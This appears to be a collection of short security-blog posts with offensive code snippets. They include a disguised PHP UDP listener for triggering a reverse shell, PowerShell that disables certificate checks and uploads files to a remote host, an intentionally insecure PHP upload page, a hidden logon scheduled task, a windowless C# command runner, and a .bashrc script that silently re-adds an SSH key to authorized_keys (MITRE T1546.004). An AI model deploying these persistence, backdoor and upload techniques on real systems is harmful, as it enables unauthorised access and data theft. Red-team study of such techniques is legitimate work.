Simple PHP Listener on UDP 10000

 Found the following site demonstrating how to create a linux service with systemd and then extended it for a reverse shell.

# Credit for the idea
# https://medium.com/@benmorel/creating-a-linux-service-with-systemd-611b5c8b91d6

$sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
socket_bind($sock, '0.0.0.0', 10000);
$setIP = "";

for (;;) {
    socket_recvfrom($sock, $message, 1024, 0, $ip, $port);
    if (strpos($message, "ip") !== false) {
            $setIP = substr($message, 3, -1);
            $reply = $setIP . "\n";
    }
    elseif (strpos($message, "port") !== false) {
            $setPort = substr($message, 5, -1);
            $reply = $setPort . "\n";
    }
    elseif ((strpos($message, "status") !== false) && (strlen($setIP) > 0) && (strlen($setPort) > 1)) {
            $reply = "IP: $setIP Port: $setPort\n";
    }
    elseif ((strpos($message, "execute") !== false) && (strlen($setIP) > 0) && (strlen($setPort) > 1)) {
            # Launches a php-reverseshell...
            $reply = "IP: $setIP Port: $setPort\n";
    }
    else {
        $reply = "Piwigo is working as expected!";
    }
    socket_sendto($sock, $reply, strlen($reply), 0, $ip, $port);
}

Powershell to Upload File to PHP Page

In the previous post, a PHP page was created to upload a file.  Below is powershell that can be used to upload a selected file from a windows computer to the PHP page.

add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
    public bool CheckValidationResult(
        ServicePoint srvPoint, X509Certificate certificate,
        WebRequest request, int certificateProblem) {
        return true;
    }
}
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Tls12'

# Name of the file to upload to server
$FileName = 'test4.txt';
# Location of file to upload
$FilePath = 'C:\users\thepcn3rd\test1.txt';
# URL of webserver (with SSL cert)
$URL = 'https://172.16.53.133/upload.php';

$fileBytes = [System.IO.File]::ReadAllBytes($FilePath);
$fileEnc = [System.Text.Encoding]::GetEncoding('ISO-8859-1').GetString($fileBytes);
$boundary = [System.Guid]::NewGuid().ToString(); 
$LF = "`r`n";

# Most difficult part is below...
$bodyLines = ( 
    "--$boundary",
    "Content-Disposition: form-data; name=`"f`"; filename=`"$FileName`"",
    "Content-Type: application/octet-stream$LF",
    $fileEnc,
    "--$boundary",
    "Content-Disposition: form-data; name=`"submit`"$LF",
    "Upload",
    "--$boundary--$LF" 
) -join $LF

Invoke-RestMethod -Uri $URL -Method Post -ContentType "multipart/form-data; boundary=`"$boundary`"" -Body $bodyLines 

Simple PHP to Upload File (Insecure)

Below is php code for a simple file upload page.  This code is insecure and could allow an upload of a backdoor to your server.

<?php
    if (isset($_POST['submit'])) {
	$currentDirectory = getcwd();
    $uploadDirectory = "/uploads/";

        $fileName = $_FILES['f']['name'];
        $fileTempName  = $_FILES['f']['tmp_name'];

    	$uploadPath = $currentDirectory . $uploadDirectory . basename($fileName); 
        move_uploaded_file($fileTempName, $uploadPath);

        echo "The file " . basename($fileName) . " has been uploaded";
    }

    
?>

<html>
<body>
    <form action="upload.php" method="post" enctype="multipart/form-data">
        Upload a File:
        <input type="file" name="f">
        <input type="submit" name="submit" value="Upload">
    </form>
</body>
</html>

XML File for Creating a Scheduled Task

 Here is a simple XML File Created from Exporting a Scheduled Task.  The scheduled task was setup to run at any user logging in and to execute a powershell command with command line arguments.

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>thepcn3rd</UserId>
      <LogonType>S4U</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-c "... | Out-Null"</Arguments>
    </Exec>
  </Actions>
</Task>

Simple C# Program to Execute Commands

 Created a simple C# program to execute commands...

using System;
using System.Text;
using System.Diagnostics;
using System.Threading;

namespace updateCheck
{
    public class check
    {
        public static void Main()
        {
            string executeCMD;
            executeCMD = "... && ";
            executeCMD += "... && ";
            executeCMD += "...";
            //Console.WriteLine(executeCMD);

            Process cmd = new Process();
            cmd.StartInfo.FileName = "cmd.exe";
            cmd.StartInfo.RedirectStandardInput = true;
            cmd.StartInfo.RedirectStandardOutput = true;
            cmd.StartInfo.RedirectStandardError = true;
            cmd.StartInfo.CreateNoWindow = true;
            cmd.StartInfo.UseShellExecute = false;
            cmd.StartInfo.Arguments = "/C " + executeCMD;
            cmd.Start();
            // Last 2 lines may need to be reversed...
            cmd.StandardOutput.ReadToEnd();
            cmd.WaitForExit();
        }
    }
}

T1546 - Unix Shell Configuration Modification

As I was researching how "Unix Shell Configuration Modification" could be tested in a .bashrc file, I created the following bash commands that could be used.  It loops through the .ssh/authorized_keys files reading each line.  A sha256 checksum is gathered for the line of the ssh_key that you wish to insert.  If the ssh_key does not exist it will insert it, if the ssh_key does exist it does nothing.

exists="False"
while read l; do
  checksum=`echo "$l" | sha256sum | awk '{print $1}'`
  # For troubleshooting uncomment the following line to verify the checksum of the line in ~/.ssh/authorized_keys
  # echo $checksum
  # Substitute the checksum for the ssh-key that you want to be reintroduced to the authorized_keys file...
  if [ "$checksum" == "333459f693d01b41c0083bf8dc25ad51e08adf4a9474a3fb34198e3967d53bd4" ]; then
	  exists="True"
  fi
done < ~/.ssh/authorized_keys
if [ "$exists" == "False" ]; then
	# Verify the ssh-key that you are using is placed below...
	echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCxGaIRqqBKzYJE+0atqKP9u/NCEElmevLyzdkPUYWHxZo16j8OykIfytbCDCagGobdCq4BOEQ48AoyecvFSG+G4NQib4iDDQMzp4+2b5Rs9LpAZgFAaU5BN2MIh7JNk6zWZ23Z5lOse4AembbyFsR0bQvfFSd1XzagUrmkH/Tg4EPgneieYyTp4vk2shvLWVxabZljsKd4hvV3Ei2xcCPU6nAqVoYNOAdUAI9HNkCf3ZDJU/zcm4MjGjCEoww0Krvuy9NuT2JIKdnk2OZHtKU4glIRLOQl3cI0AZaq6IF5VYsniVy+Ag6hVsLfEb7ByJIVlYkvgsW0POjfqLYezGd1Cwz5BKiTJUsCTt/GRhOgpAEkRVhY6TuMr/wgnyUMWxvSsiiLVahU4zvwyJsf8FD5vEhjc4yq+uwB7GX38fVam19LLRcF3OzHm3+mOxZRXjctnq5S6AQMRdTzHzC1tsj0= invalid@key" >> ~/.ssh/authorized_keys
fi 

Reference: https://attack.mitre.org/techniques/T1546/004/